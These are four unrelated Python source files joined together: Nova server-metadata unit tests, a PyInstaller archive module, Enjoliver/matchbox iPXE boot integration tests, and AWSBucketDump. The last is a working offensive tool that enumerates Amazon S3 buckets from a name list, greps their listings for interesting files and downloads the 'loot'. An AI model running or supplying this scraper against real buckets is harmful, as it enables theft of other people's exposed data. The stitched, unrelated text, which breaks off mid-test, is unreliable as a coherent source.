def test_update_item_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'key1', None)
def test_update_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, '', body)
def test_update_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.uuid, ("a" * 260), body)
def test_update_item_value_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.uuid, "key1", body)
def test_update_item_too_many_keys(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'key1', body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'bad', body)
def test_too_many_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
#test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
#test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
#test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, data)
def test_too_many_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
def test_invalid_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
#test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
#test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
#test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, data)
class BadStateServerMetaDataTest(BaseTest):
def setUp(self):
super(BadStateServerMetaDataTest, self).setUp()
self.stubs.Set(nova.db, 'instance_get', self._return_server_in_build)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
self._return_server_in_build_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
def test_invalid_state_on_delete(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, self.uuid, 'key2')
def test_invalid_state_on_update_metadata(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, expected)
def _return_server_in_build(self, context, server_id,
columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
def _return_server_in_build_by_uuid(self, context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
@mock.patch.object(nova.compute.api.API, 'update_instance_metadata',
side_effect=exception.InstanceIsLocked(instance_uuid=0))
def test_instance_lock_update_metadata(self, mock_update):
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'keydummy': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, expected)
|
|
#
# Copyright (C) 2005, Giovanni Bajo
# Based on previous work under copyright (c) 2002 McMillan Enterprises, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition to the permissions in the GNU General Public License, the
# authors give you unlimited permission to link or embed the compiled
# version of this file into combinations with other programs, and to
# distribute those combinations without any restriction coming from the
# use of this file. (The General Public License restrictions do apply in
# other respects; for example, they cover modification of the file, and
# distribution when not linked into a combine executable.)
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
# Subclasses may not need marshal or struct, but since they're
# builtin, importing is safe.
#
# While an Archive is really an abstraction for any "filesystem
# within a file", it is tuned for use with imputil.FuncImporter.
# This assumes it contains python code objects, indexed by the
# the internal name (ie, no '.py').
#
# See pyi_carchive.py for a more general archive (contains anything)
# that can be understood by a C program.
_verbose = 0
_listdir = None
_environ = None
### **NOTE** This module is used during bootstrap.
### Import *ONLY* builtin modules.
import marshal
import struct
import imp
import sys
def debug(msg):
if 0:
sys.stderr.write(msg + "\n")
sys.stderr.flush()
_c_suffixes = filter(lambda x: x[2] == imp.C_EXTENSION, imp.get_suffixes())
for nm in ('nt', 'posix'):
if nm in sys.builtin_module_names:
mod = __import__(nm)
_listdir = mod.listdir
_environ = mod.environ
break
versuffix = '%d%d' % sys.version_info[:2] # :todo: is this still used?
if "-vi" in sys.argv[1:]:
_verbose = 1
class ArchiveReadError(RuntimeError):
pass
class Archive(object):
"""
A base class for a repository of python code objects.
The extract method is used by imputil.ArchiveImporter
to get code objects by name (fully qualified name), so
an enduser "import a.b" would become
extract('a.__init__')
extract('a.b')
"""
MAGIC = 'PYL\0'
HDRLEN = 12 # default is MAGIC followed by python's magic, int pos of toc
TOCPOS = 8
TOCTMPLT = {}
os = None
_bincache = None
def __init__(self, path=None, start=0):
"""
Initialize an Archive. If path is omitted, it will be an empty Archive.
"""
self.toc = None
self.path = path
self.start = start
import imp
self.pymagic = imp.get_magic()
if path is not None:
self.lib = open(self.path, 'rb')
self.checkmagic()
self.loadtoc()
####### Sub-methods of __init__ - override as needed #############
def checkmagic(self):
"""
Overridable.
Check to see if the file object self.lib actually has a file
we understand.
"""
self.lib.seek(self.start) # default - magic is at start of file
if self.lib.read(len(self.MAGIC)) != self.MAGIC:
raise ArchiveReadError("%s is not a valid %s archive file"
% (self.path, self.__class__.__name__))
if self.lib.read(len(self.pymagic)) != self.pymagic:
raise ArchiveReadError("%s has version mismatch to dll" %
(self.path))
self.lib.read(4)
def loadtoc(self):
"""
Overridable.
Default: After magic comes an int (4 byte native) giving the
position of the TOC within self.lib.
Default: The TOC is a marshal-able string.
"""
self.lib.seek(self.start + self.TOCPOS)
(offset,) = struct.unpack('!i', self.lib.read(4))
self.lib.seek(self.start + offset)
self.toc = marshal.load(self.lib)
######## This is what is called by FuncImporter #######
## Since an Archive is flat, we ignore parent and modname.
#XXX obsolete - imputil only code
## def get_code(self, parent, modname, fqname):
## pass
####### Core method - Override as needed #########
def extract(self, name):
"""
Get the object corresponding to name, or None.
For use with imputil ArchiveImporter, object is a python code object.
'name' is the name as specified in an 'import name'.
'import a.b' will become:
extract('a') (return None because 'a' is not a code object)
extract('a.__init__') (return a code object)
extract('a.b') (return a code object)
Default implementation:
self.toc is a dict
self.toc[name] is pos
self.lib has the code object marshal-ed at pos
"""
ispkg, pos = self.toc.get(name, (0, None))
if pos is None:
return None
self.lib.seek(self.start + pos)
return ispkg, marshal.load(self.lib)
########################################################################
# Informational methods
def contents(self):
"""
Return a list of the contents
Default implementation assumes self.toc is a dict like object.
Not required by ArchiveImporter.
"""
return self.toc.keys()
########################################################################
# Building
####### Top level method - shouldn't need overriding #######
def _start_add_entries(self, path):
"""
Open an empty archive for addition of entries.
"""
assert(self.path is None)
self.path = path
self.lib = open(path, 'wb')
# Reserve space for the header.
if self.HDRLEN:
self.lib.write('\0' * self.HDRLEN)
# Create an empty table of contents.
if type(self.TOCTMPLT) == type({}):
self.toc = {}
else:
# FIXME Why do we need to assume callables and
# why not use @property decorator.
self.toc = self.TOCTMPLT() # Assume callable.
def _add_from_table_of_contents(self, toc):
"""
Add entries from a logical TOC (without absolute positioning info).
An entry is an entry in a logical TOC is a tuple,
entry[0] is name (under which it will be saved).
entry[1] is fullpathname of the file.
entry[2] is a flag for it's storage format (True or 1 if compressed)
entry[3] is the entry's type code.
"""
for toc_entry in toc:
self.add(toc_entry) # The guts of the archive.
def _finalize(self):
"""
Finalize an archive which has been opened using _start_add_entries(),
writing any needed padding and the table of contents.
"""
toc_pos = self.lib.tell()
self.save_toc(toc_pos)
if self.HDRLEN:
self.update_headers(toc_pos)
self.lib.close()
def build(self, archive_path, logical_toc):
"""
Create an archive file of name 'archive_path'.
logical_toc is a 'logical TOC' - a list of (name, path, ...)
where name is the internal name, eg 'a'
and path is a file to get the object from, eg './a.pyc'.
"""
self._start_add_entries(archive_path)
self._add_from_table_of_contents(logical_toc)
self._finalize()
####### manages keeping the internal TOC and the guts in sync #######
def add(self, entry):
"""
Override this to influence the mechanics of the Archive.
Assumes entry is a seq beginning with (nm, pth, ...) where
nm is the key by which we'll be asked for the object.
pth is the name of where we find the object. Overrides of
get_obj_from can make use of further elements in entry.
"""
if self.os is None:
import os
self.os = os
nm = entry[0]
pth = entry[1]
pynm, ext = self.os.path.splitext(self.os.path.basename(pth))
ispkg = pynm == '__init__'
assert ext in ('.pyc', '.pyo')
self.toc[nm] = (ispkg, self.lib.tell())
f = open(entry[1], 'rb')
f.seek(8) # skip magic and timestamp
self.lib.write(f.read())
def save_toc(self, tocpos):
"""
Default - toc is a dict
Gets marshaled to self.lib
"""
marshal.dump(self.toc, self.lib)
def update_headers(self, tocpos):
"""
Default - MAGIC + Python's magic + tocpos
"""
self.lib.seek(self.start)
self.lib.write(self.MAGIC)
self.lib.write(self.pymagic)
self.lib.write(struct.pack('!i', tocpos))
class ZlibArchive(Archive):
"""
ZlibArchive - an archive with compressed entries. Archive is read
from the executable created by PyInstaller.
"""
MAGIC = 'PYZ\0'
TOCPOS = 8
HDRLEN = Archive.HDRLEN + 5
TOCTMPLT = {}
LEVEL = 9
NO_COMPRESSION_LEVEL = 0
def __init__(self, path=None, offset=None, level=9):
if path is None:
offset = 0
elif offset is None:
for i in range(len(path) - 1, - 1, - 1):
if path[i] == '?':
try:
offset = int(path[i + 1:])
except ValueError:
# Just ignore any spurious "?" in the path
# (like in Windows UNC \\?\<path>).
continue
path = path[:i]
break
else:
offset = 0
# Zlib compression level.
self.LEVEL = level
Archive.__init__(self, path, offset)
# dynamic import so not imported if not needed
self._mod_zlib = None
if self.LEVEL > self.NO_COMPRESSION_LEVEL:
try:
self._mod_zlib = __import__('zlib')
except ImportError:
raise RuntimeError('zlib required but cannot be imported')
# TODO this attribute is deprecated and not used anymore.
self.crypted = 0
def extract(self, name):
(ispkg, pos, lngth) = self.toc.get(name, (0, None, 0))
if pos is None:
return None
self.lib.seek(self.start + pos)
obj = self.lib.read(lngth)
try:
obj = self._mod_zlib.decompress(obj)
except self._mod_zlib.error:
raise ImportError("PYZ entry '%s' failed to decompress" % name)
try:
co = marshal.loads(obj)
except EOFError:
raise ImportError("PYZ entry '%s' failed to unmarshal" % name)
return ispkg, co
def add(self, entry):
if self.os is None:
import os
self.os = os
nm = entry[0]
pth = entry[1]
base, ext = self.os.path.splitext(self.os.path.basename(pth))
ispkg = base == '__init__'
try:
txt = open(pth[:-1], 'rU').read() + '\n'
except (IOError, OSError):
try:
f = open(pth, 'rb')
f.seek(8) # skip magic and timestamp
bytecode = f.read()
marshal.loads(bytecode).co_filename # to make sure it's valid
obj = self._mod_zlib.compress(bytecode, self.LEVEL)
except (IOError, ValueError, EOFError, AttributeError):
raise ValueError("bad bytecode in %s and no source" % pth)
else:
txt = txt.replace('\r\n', '\n')
try:
import os
co = compile(txt, self.os.path.join(self.path, nm), 'exec')
except SyntaxError, e:
print "Syntax error in", pth[:-1]
print e.args
raise
obj = self._mod_zlib.compress(marshal.dumps(co), self.LEVEL)
self.toc[nm] = (ispkg, self.lib.tell(), len(obj))
self.lib.write(obj)
def update_headers(self, tocpos):
"""
add level
"""
Archive.update_headers(self, tocpos)
self.lib.write(struct.pack('!iB', self.LEVEL, self.crypted))
def checkmagic(self):
Archive.checkmagic(self)
self.LEVEL, self.crypted = struct.unpack('!iB', self.lib.read(5))
|
|
#!/usr/bin/env python
# AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically to S3
# buckets and also has some extra features that allow you to grep for
# delicous files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# by Jordan Potti
# @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list=None
arguments = None
def fetch(url):
print('fetching ' + url)
response = requests.get(url)
if response.status_code == 403 or response.status_code == 404:
status403(url)
if response.status_code == 200:
if "Content" in response.text:
returnedList=status200(response,grep_list,url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('download worker running')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename))
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size.. skipping..\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically to S3
buckets and also has some extra features that allow you to grep for
delicous files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
by Jordan Potti
@ok_bye_now'''
)
def cleanUp():
print("Cleaning Up Files")
def status403(line):
#print(line.rstrip() + " is not accessible")
return
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip())
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+'/'+words
if grep_list != None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant diskspace")
parser.add_argument("-d", dest="savedir", required=False, default='', help="if -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="thread count.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
with open(arguments.grepwords, "r") as grep_file:
grep_content = grep_file.readlines()
grep_list = [ g.strip() for g in grep_content ]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), and save directories (-d) for each host will be created/used")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), and will be saved to current directory")
else:
print("Downloads were not enabled (-D), not saving results locally.")
# start up bucket workers
for i in range(0,arguments.threads):
print('starting thread')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
# start download workers
for i in range(1, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
if len(line.rstrip()) < 1:
continue
bucket = 'https://'+line.rstrip()+'.s3.amazonaws.com'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket = 'http://'+line.rstrip()+'.s3.amazonaws.com'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
|
|
import json
import os
from multiprocessing import Process
from unittest import TestCase
import requests
import sys
import time
from app import generator
# ec = configs.EnjoliverConfig(importer=__file__)
class IOErrorToWarning(object):
def __enter__(self):
generator.GenerateCommon._raise_enof = Warning
def __exit__(self, ext, exv, trb):
generator.GenerateCommon._raise_enof = IOError
class TestBootConfigCommon(TestCase):
p_matchbox = Process
gen = generator.Generator
func_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(func_path)[0]
app_path = os.path.split(tests_path)[0]
project_path = os.path.split(app_path)[0]
matchbox_path = "%s/matchbox" % project_path
assets_path = "%s/matchbox/assets" % project_path
runtime_path = "%s/runtime" % project_path
rkt_bin = "%s/rkt/rkt" % runtime_path
matchbox_bin = "%s/matchbox/matchbox" % runtime_path
test_matchbox_path = "%s/test_matchbox" % tests_path
matchbox_port = int(os.getenv("MATCHBOX_PORT", "8080"))
# matchbox_address = "0.0.0.0:%d" % matchbox_port
matchbox_endpoint = "http://localhost:%d" % matchbox_port
api_uri = "http://127.0.0.1:5000"
@staticmethod
def process_target():
os.environ["ENJOLIVER_MATCHBOX_PATH"] = TestBootConfigCommon.test_matchbox_path
os.environ["ENJOLIVER_MATCHBOX_ASSETS"] = TestBootConfigCommon.assets_path
cmd = [
"%s" % sys.executable,
"%s/manage.py" % TestBootConfigCommon.project_path,
"matchbox"
]
print("PID -> %s\n"
"exec -> %s\n" % (
os.getpid(), " ".join(cmd)))
sys.stdout.flush()
os.execve(cmd[0], cmd, os.environ)
@classmethod
def generator(cls):
marker = "%s" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker
try:
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
except IOError:
print(
"\nWARNING %s override %s in %s\n" %
(cls.__name__,
generator.GenerateCommon._raise_enof,
Warning))
sys.stderr.flush()
with IOErrorToWarning():
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
cls.gen.dumps()
@classmethod
def setUpClass(cls):
time.sleep(0.1)
cls.clean_sandbox()
if os.path.isfile("%s" % TestBootConfigCommon.matchbox_bin) is False:
raise IOError("%s" % TestBootConfigCommon.matchbox_bin)
cls.p_matchbox = Process(target=TestBootConfigCommon.process_target)
print("PPID -> %s\n" % os.getpid())
cls.p_matchbox.start()
assert cls.p_matchbox.is_alive() is True
cls.generator()
cls.matchbox_running(cls.matchbox_endpoint, cls.p_matchbox)
@classmethod
def tearDownClass(cls):
print("TERM -> %d\n" % cls.p_matchbox.pid)
sys.stdout.flush()
cls.p_matchbox.terminate()
cls.p_matchbox.join(timeout=5)
cls.clean_sandbox()
time.sleep(0.2)
@staticmethod
def clean_sandbox():
dirs = ["%s/%s" % (
TestBootConfigCommon.test_matchbox_path, k) for k in (
"profiles", "groups")]
for d in dirs:
for f in os.listdir(d):
if ".json" in f:
os.remove("%s/%s" % (d, f))
def setUp(self):
self.assertTrue(self.p_matchbox.is_alive())
try:
self.assertEqual(self.gen.group.api_uri, self.gen.profile.api_uri)
except AttributeError:
# gen not declared
pass
@staticmethod
def matchbox_running(matchbox_endpoint, p_matchbox):
response_body = ""
response_code = 404
for i in range(10):
assert p_matchbox.is_alive() is True
try:
request = requests.get(matchbox_endpoint)
response_body = request.content
response_code = request.status_code
request.close()
break
except requests.exceptions.ConnectionError:
pass
time.sleep(0.2)
assert b"matchbox\n" == response_body
assert 200 == response_code
def test_01_boot_dot_ipxe(self):
request = requests.get("%s/boot.ipxe" % self.matchbox_endpoint)
response = request.content
request.close()
self.assertEqual(
response,
b"#!ipxe\n"
b"chain ipxe?uuid=${uuid}&mac=${mac:hexhyp}&domain=${domain}&hostname=${hostname}&serial=${serial}\n")
def test_02_ipxe(self):
request = requests.get("%s/ipxe" % self.matchbox_endpoint)
response = request.content.decode()
request.close()
response = response.replace(" \n", "\n")
lines = response.split("\n")
lines = [k for k in lines if k]
shebang = lines[0]
self.assertEqual(shebang, "#!ipxe")
kernel = lines[1].split(" ")
kernel_expect = [
'kernel',
'%s/assets/coreos/serve/coreos_production_pxe.vmlinuz' % self.gen.profile.api_uri,
"console=ttyS0", "console=ttyS1",
'coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp}' % self.gen.profile.api_uri,
'coreos.first_boot',
"coreos.oem.id=pxe"]
self.assertEqual(kernel, kernel_expect)
init_rd = lines[2].split(" ")
init_rd_expect = ['initrd',
'%s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz' % self.gen.profile.api_uri]
self.assertEqual(init_rd, init_rd_expect)
boot = lines[3]
self.assertEqual(boot, "boot")
self.assertEqual(len(lines), 4)
def test_03_assets(self):
request = requests.get("%s/assets" % self.matchbox_endpoint)
request.close()
self.assertEqual(200, request.status_code)
def test_03_assets_coreos_serve_404(self):
r = requests.get("%s/assets/coreos/serve/404_request.not-here" % self.matchbox_endpoint)
self.assertEqual(404, r.status_code)
class TestBootConfigHelloWorld(TestBootConfigCommon):
def test_a0_ignition(self):
request = requests.get("%s/ignition" % self.matchbox_endpoint)
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [{
u'group': {},
u'user': {},
u'filesystem':
u'root',
u'path': u'/tmp/hello',
u'contents': {
u'source': u'data:,Hello%20World%0A',
u'verification': {}
},
u'mode': 420}
]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
class TestBootConfigSelector(TestBootConfigCommon):
mac = "00:00:00:00:00:00"
@classmethod
def generator(cls):
marker = "%s" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
selector={"mac": cls.mac},
matchbox_path=cls.test_matchbox_path
)
cls.gen.dumps()
def test_02_ipxe(self):
request = requests.get("%s/ipxe?mac=%s" % (self.matchbox_endpoint, self.mac))
response = request.content.decode()
request.close()
response = response.replace(" \n", "\n")
lines = response.split("\n")
lines = [k for k in lines if k]
shebang = lines[0]
self.assertEqual(shebang, "#!ipxe")
kernel = lines[1].split(" ")
kernel_expect = [
'kernel',
'%s/assets/coreos/serve/coreos_production_pxe.vmlinuz' % self.gen.profile.api_uri,
"console=ttyS0", "console=ttyS1",
'coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp}' % self.gen.profile.api_uri,
'coreos.first_boot',
"coreos.oem.id=pxe"]
self.assertEqual(kernel, kernel_expect)
init_rd = lines[2].split(" ")
init_rd_expect = ['initrd',
'%s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz' % self.gen.profile.api_uri]
self.assertEqual(init_rd, init_rd_expect)
boot = lines[3]
self.assertEqual(boot, "boot")
self.assertEqual(len(lines), 4)
def test_a1_ipxe_raise(self):
r = requests.get("%s/ipxe" % self.matchbox_endpoint)
self.assertEqual(404, r.status_code)
def test_a2_ipxe_raise(self):
r = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, "01:01:01:01:01:01"))
self.assertEqual(404, r.status_code)
def test_a0_ignition(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelector%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
class TestBootConfigSelectors(TestBootConfigCommon):
mac_one = "00:00:00:00:00:01"
mac_two = "00:00:00:00:00:02"
mac_three = "00:00:00:00:00:03"
# @staticmethod
# def clean_sandbox():
# # Don't clean
# pass
@classmethod
def generator(cls):
marker_one = "%s-one" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker_one
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_one,
name="name-%s" % marker_one,
ignition_id=ignition_file,
selector={"mac": cls.mac_one},
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
marker_two = "%s-two" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker_two
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_two,
name="name-%s" % marker_two,
ignition_id=ignition_file,
selector={"mac": cls.mac_two},
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
marker_three = "%s-three" % cls.__name__.lower()
ignition_file = "inte-testbootconfigselectors-default.yaml"
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_three,
name="name-%s" % marker_three,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
def test_ignition_1(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_one))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
